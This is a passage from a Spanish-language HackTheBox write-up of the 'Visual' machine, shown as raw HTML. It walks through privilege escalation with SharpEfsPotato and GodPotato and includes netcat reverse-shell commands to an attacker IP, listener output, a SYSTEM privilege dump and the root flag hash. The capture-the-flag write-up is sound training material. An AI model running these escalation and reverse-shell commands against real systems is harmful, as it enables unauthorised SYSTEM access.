class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt;sep.exe -p C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span>1.0<span class="se">\p</span>owershell.exe -a <span class="s2">&#34;whoami | Set-Content c:/file.log&#34;</span> </span></span><span class="line"><span class="cl">sep.exe -p C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span>1.0<span class="se">\p</span>owershell.exe -a <span class="s2">&#34;whoami | Set-Content c:/file.log&#34;</span> </span></span><span class="line"><span class="cl">SharpEfsPotato by @bugch3ck </span></span><span class="line"><span class="cl"> Local privilege escalation from SeImpersonatePrivilege using EfsRpc. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Triggering name pipe access on evil PIPE <span class="se">\\</span>localhost/pipe/ec275b61-c7fd-4014-a16a-1acd5cb6b5a4/<span class="se">\e</span>c275b61-c7fd-4014-a16a-1acd5cb6b5a4<span class="se">\e</span>c275b61-c7fd-4014-a16a-1acd5cb6b5a4 </span></span><span class="line"><span class="cl">df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: </span></span><span class="line"><span class="cl"><span class="o">[</span>x<span class="o">]</span>RpcBindingSetAuthInfo failed with status 0x6d3 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Server connected to our evil RPC pipe </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Duplicated impersonation token ready <span class="k">for</span> process creation </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Intercepted and authenticated successfully, launching program </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Process created, enjoy! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt;more c:<span class="se">\f</span>ile.log </span></span><span class="line"><span class="cl">more c:<span class="se">\f</span>ile.log </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="shell">Shell</h2> <p>Nuevamente ejecutamos SharpEfsPotato esta vez con una shell inversa.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt;sep.exe -p C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span>1.0<span class="se">\p</span>owershell.exe -a <span class="s2">&#34;cd C:\users\public\documents\ ; .\nc.exe -e powershell.exe 10.10.15.0 1339&#34;</span> </span></span><span class="line"><span class="cl">sep.exe -p C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span>1.0<span class="se">\p</span>owershell.exe -a <span class="s2">&#34;cd C:\users\public\documents\ ; .\nc.exe -e powershell.exe 10.10.15.0 1339&#34;</span> </span></span><span class="line"><span class="cl">SharpEfsPotato by @bugch3ck </span></span><span class="line"><span class="cl"> Local privilege escalation from SeImpersonatePrivilege using EfsRpc. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Triggering name pipe access on evil PIPE <span class="se">\\</span>localhost/pipe/12d3e921-85df-476f-8bf5-4a34db9a925f/<span class="se">\1</span>2d3e921-85df-476f-8bf5-4a34db9a925f<span class="se">\1</span>2d3e921-85df-476f-8bf5-4a34db9a925f </span></span><span class="line"><span class="cl">df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: </span></span><span class="line"><span class="cl"><span class="o">[</span>x<span class="o">]</span>RpcBindingSetAuthInfo failed with status 0x6d3 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Server connected to our evil RPC pipe </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Duplicated impersonation token ready <span class="k">for</span> process creation </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Intercepted and authenticated successfully, launching program </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Process created, enjoy! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Tras la ejecucion logramos el acceso con una shell system.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ rlwrap nc -lvp <span class="m">1339</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1339</span> ... </span></span><span class="line"><span class="cl">10.10.11.234: inverse host lookup failed: Unknown host </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.0<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.234<span class="o">]</span> <span class="m">49744</span> </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl">whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=========================================</span> <span class="o">==================================================================</span> <span class="o">=======</span> </span></span><span class="line"><span class="cl">SeCreateTokenPrivilege Create a token object Enabled </span></span><span class="line"><span class="cl">SeAssignPrimaryTokenPrivilege Replace a process level token Enabled </span></span><span class="line"><span class="cl">SeLockMemoryPrivilege Lock pages in memory Enabled </span></span><span class="line"><span class="cl">SeIncreaseQuotaPrivilege Adjust memory quotas <span class="k">for</span> a process Enabled </span></span><span class="line"><span class="cl">SeTcbPrivilege Act as part of the operating system Enabled </span></span><span class="line"><span class="cl">SeSecurityPrivilege Manage auditing and security log Enabled </span></span><span class="line"><span class="cl">SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled </span></span><span class="line"><span class="cl">SeLoadDriverPrivilege Load and unload device drivers Enabled </span></span><span class="line"><span class="cl">SeSystemProfilePrivilege Profile system performance Enabled </span></span><span class="line"><span class="cl">SeSystemtimePrivilege Change the system <span class="nb">time</span> Enabled </span></span><span class="line"><span class="cl">SeProfileSingleProcessPrivilege Profile single process Enabled </span></span><span class="line"><span class="cl">SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled </span></span><span class="line"><span class="cl">SeCreatePagefilePrivilege Create a pagefile Enabled </span></span><span class="line"><span class="cl">SeCreatePermanentPrivilege Create permanent shared objects Enabled </span></span><span class="line"><span class="cl">SeBackupPrivilege Back up files and directories Enabled </span></span><span class="line"><span class="cl">SeRestorePrivilege Restore files and directories Enabled </span></span><span class="line"><span class="cl">SeShutdownPrivilege Shut down the system Enabled </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Enabled </span></span><span class="line"><span class="cl">SeAuditPrivilege Generate security audits Enabled </span></span><span class="line"><span class="cl">SeSystemEnvironmentPrivilege Modify firmware environment values Enabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeUndockPrivilege Remove computer from docking station Enabled </span></span><span class="line"><span class="cl">SeManageVolumePrivilege Perform volume maintenance tasks Enabled </span></span><span class="line"><span class="cl">SeImpersonatePrivilege Impersonate a client after authentication Enabled </span></span><span class="line"><span class="cl">SeCreateGlobalPrivilege Create global objects Enabled </span></span><span class="line"><span class="cl">SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted <span class="nb">caller</span> Enabled </span></span><span class="line"><span class="cl">SeRelabelPrivilege Modify an object label Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span><span class="line"><span class="cl">SeTimeZonePrivilege Change the <span class="nb">time</span> zone Enabled </span></span><span class="line"><span class="cl">SeCreateSymbolicLinkPrivilege Create symbolic links Enabled </span></span><span class="line"><span class="cl">SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token <span class="k">for</span> another user in the same session Enabled </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Finalmente la lectura de nuestra flag <code>root.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; <span class="nb">cd</span> c:/users/administrator/desktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> c:/users/administrator/desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop&gt; dir </span></span><span class="line"><span class="cl">dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 10/26/2023 11:22 AM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">cat root.txt </span></span><span class="line"><span class="cl">26bd25320fc5f626a0b1cc6fde8486c8 </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="fail">Fail</h2> <h3 id="fullpowers-fail">FullPowers Fail</h3> <p>Intentamos ejecutar FullPowers el cual automatizaria la ejecucion de la task la cual nos daria los privilegios de vuelta, sin embargo no se ejecuta.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt;dir </span></span><span class="line"><span class="cl"> Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is 82EF-5600 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">10/26/2023 07:07 PM &lt;DIR&gt; . </span></span><span class="line"><span class="cl">10/26/2023 07:07 PM &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">10/26/2023 07:07 PM 122,368 FullPowers.exe </span></span><span class="line"><span class="cl">10/26/2023 07:06 PM 59,392 nc.exe </span></span><span class="line"><span class="cl"> <span class="m">2</span> File<span class="o">(</span>s<span class="o">)</span> 181,760 bytes </span></span><span class="line"><span class="cl"> <span class="m">2</span> Dir<span class="o">(</span>s<span class="o">)</span> 9,539,039,232 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt;FullPowers.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="godpotato">GodPotato</h3> <p>GodPotato ejecutaba una shell inversa sin embargo la shell moria un segundo despues de realizar la conexion.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt; .<span class="se">\G</span>odPotato.exe -cmd <span class="s2">&#34;cmd /c c:/users/public/documents/nc.exe -e powershell 10.10.15.0 1330&#34;</span> </span></span><span class="line"><span class="cl">.<span class="se">\G</span>odPotato.exe -cmd <span class="s2">&#34;cmd /c c:/users/public/documents/nc.exe -e powershell 10.10.15.0 1330&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> CombaseModule: 0x140737250983936 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DispatchTable: 0x140737253290096 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> UseProtseqFunction: 0x140737252666272 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> UseProtseqFunctionParamCount: <span class="m">6</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> HookRPC </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Start PipeServer </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> CreateNamedPipe <span class="se">\\</span>.<span class="se">\p</span>ipe<span class="se">\7</span>f5271d4-7cb8-49aa-9b6e-f5b8ade744d7<span class="se">\p</span>ipe<span class="se">\e</span>pmapper </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trigger RPCSS </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DCOM obj GUID: 00000000-0000-0000-c000-000000000046 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DCOM obj IPID: 00008802-11bc-ffff-ee75-22dd2b72e2eb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DCOM obj OXID: 0xc1d18eccad13a01b </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DCOM obj OID: 0xb5c70464dd4ef4f </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DCOM obj Flags: 0x281 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DCOM obj PublicRefs: 0x0 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Marshal Object bytes len: <span class="m">100</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> UnMarshal Object </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Pipe Connected! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> CurrentUser: NT AUTHORITY<span class="se">\N</span>ETWORK SERVICE </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> CurrentsImpersonationLevel: Impersonation </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Start Search System Token </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> PID : <span class="m">860</span> Token:0x808 User: NT AUTHORITY<span class="se">\S</span>YSTEM ImpersonationLevel: Impersonation </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Find System Token : True </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> UnmarshalObject: 0x80070776 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> CurrentUser: NT AUTHORITY<span class="se">\S</span>YSTEM </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> process start with pid <span class="m">2024</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/visual ❯ rlwrap nc -lvp <span class="m">1330</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1330</span> ... </span></span><span class="line"><span class="cl">10.10.11.234: inverse host lookup failed: Unknown host </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.15.0<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.234<span class="o">]</span> <span class="m">49733</span> </span></span><span class="line"><span class="cl"> π ~/htb/visual ❯ </span></span></code></pre></td></tr></table> </div> </div>]]> sckull featured image meta image visual-studio git-http-server C# prebuildevent postbuildevent nishang xampp php SeImpersonatePrivilege SharpEfsPotato hackthebox linux